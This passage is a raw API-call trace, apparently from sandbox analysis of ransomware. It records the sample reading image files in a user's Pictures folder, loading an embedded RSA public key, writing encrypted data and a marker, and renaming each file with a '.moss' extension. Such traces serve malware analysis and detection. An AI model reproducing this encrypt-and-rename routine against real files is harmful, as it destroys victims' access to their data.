dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e718 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e718 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b48a18 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48c28 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x3aa2470 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0172.806] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0172.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e718 | out: hHeap=0xcd0000) returned 1 [0172.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48e40 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0172.807] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35be150 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ed88 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35be150 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c28 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48e40 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e748 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e730 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e700 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e6e8 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b577f8 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a18 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0172.807] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0172.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0172.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0172.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0172.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0172.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.808] WriteFile (in: hFile=0x664, lpBuffer=0x3b58120*, nNumberOfBytesToWrite=0x2377, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b58120*, lpNumberOfBytesWritten=0x401fb14*=0x2377, lpOverlapped=0x0) returned 1 [0172.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b58120 | out: hHeap=0xcd0000) returned 1 [0172.808] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x237c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.808] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0172.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0172.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0172.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0172.808] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0172.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0172.808] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0172.808] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0172.808] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0172.808] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0172.809] CloseHandle (hObject=0x664) returned 1 [0172.810] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xd0) returned 0x35c44a8 [0172.810] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e0) returned 0x3b44498 [0172.810] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35c44a8 | out: hHeap=0xcd0000) returned 1 [0172.810] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\DJGdhVBMBO.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\c v_s8 i6b\\djgdhvbmbo.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\DJGdhVBMBO.png.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\c v_s8 i6b\\djgdhvbmbo.png.moss")) returned 1 [0172.813] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.813] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.813] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.814] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0172.814] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddcce7e0, ftCreationTime.dwHighDateTime=0x1d5df0d, ftLastAccessTime.dwLowDateTime=0xc11b96b0, ftLastAccessTime.dwHighDateTime=0x1d5df0c, ftLastWriteTime.dwLowDateTime=0xc11b96b0, ftLastWriteTime.dwHighDateTime=0x1d5df0c, nFileSizeHigh=0x0, nFileSizeLow=0x17211, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dWbx.png", cAlternateFileName="")) returned 1 [0172.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0172.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11e) returned 0x35ceae8 [0172.814] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0172.815] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\dWbx.png") returned=".png" [0172.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\dWbx.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\c v_s8 i6b\\dwbx.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.815] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=94737) returned 1 [0172.815] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.818] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x171eb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.818] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.818] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.818] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.818] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0172.818] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x17211, lpOverlapped=0x0) returned 1 [0172.819] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.819] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.819] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.819] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.819] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ed88) returned 1 [0172.820] CryptCreateHash (in: hProv=0xd2ed88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.820] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.820] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.821] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.821] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.821] GetLastError () returned 0x0 [0172.821] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.821] CryptReleaseContext (hProv=0xd2ed88, dwFlags=0x0) returned 1 [0172.821] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.821] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.821] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.821] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.821] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.821] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.821] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.821] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x17210) returned 0x3b62d40 [0172.821] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0172.821] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b48820 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b577f8 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e6e8 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b57840 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e700 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e730 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e748 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0172.822] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48a18 [0172.822] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e730 | out: hHeap=0xcd0000) returned 1 [0172.822] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e748 | out: hHeap=0xcd0000) returned 1 [0172.822] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.822] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0172.822] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a18 | out: hHeap=0xcd0000) returned 1 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e748 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4e730 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa27b8 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0172.822] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0172.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0172.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e748 | out: hHeap=0xcd0000) returned 1 [0172.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0172.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e730 | out: hHeap=0xcd0000) returned 1 [0172.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0172.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0172.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0172.823] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0172.823] GetCurrentThreadId () returned 0x324 [0172.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0172.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b544f0 [0172.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0172.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ed88 [0172.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0xd23a00 [0172.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0172.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0172.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0172.823] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.824] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x17211, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.824] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.824] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\dWbx.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\c v_s8 i6b\\dwbx.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\dWbx.png.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\c v_s8 i6b\\dwbx.png.moss")) returned 1 [0172.826] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\R9-vmE0.bmp") returned=".bmp" [0172.826] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\js4wnFUoxs42X9Y0mylB\\YD0LTf1VnnELtRyQ6\\C v_S8 I6B\\R9-vmE0.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\js4wnfuoxs42x9y0mylb\\yd0ltf1vnneltryq6\\c v_s8 i6b\\r9-vme0.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.827] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=42559) returned 1 [0172.827] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.830] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xa619, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.830] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.831] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.831] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, 